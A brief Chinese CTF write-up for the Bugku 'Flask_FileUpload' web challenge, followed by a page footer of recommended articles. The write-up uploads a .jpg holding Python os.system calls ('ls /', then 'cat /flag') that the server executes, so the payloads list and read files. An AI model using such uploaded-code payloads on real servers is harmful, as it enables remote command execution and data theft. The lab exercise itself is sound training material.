Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
牛奶5 小时前
AI辅助开发最佳实践:2026年新方法
前端·aigc·ai编程
xixihaha13246 小时前
将Python Web应用部署到服务器(Docker + Nginx)
jvm·数据库·python
xixihaha13246 小时前
Python游戏中的碰撞检测实现
jvm·数据库·python
C澒6 小时前
微前端容器标准化:公共能力标准化
前端·架构
Setsuna_F_Seiei7 小时前
AI 对话应用之 JS 的流式接口数据处理
前端·javascript·ai编程
ID_180079054737 小时前
模拟1688商品详情的Python API实现,返回符合风格的JSON数据
开发语言·python·json
青柠代码录7 小时前
【Vue3】Vue Router 4 路由全解
前端·vue.js
程序员小远7 小时前
软件测试之功能测试详解
自动化测试·软件测试·python·功能测试·测试工具·职场和发展·测试用例
无限大67 小时前
《AI观,观AI》:专栏总结+答疑|吃透核心,解决你用AI的所有困惑
前端·后端
我的xiaodoujiao8 小时前
API接口自动化测试详细图文教程学习系列1--序章
python·学习·pytest
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04UV安装并设置国内源05OpenClaw Control UI安全上下文访问配置06OpenClaw macOS 完整安装与本地模型配置教程(实战版)07本地部署 OpenClaw + DeepSeek-R1 完全指南08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南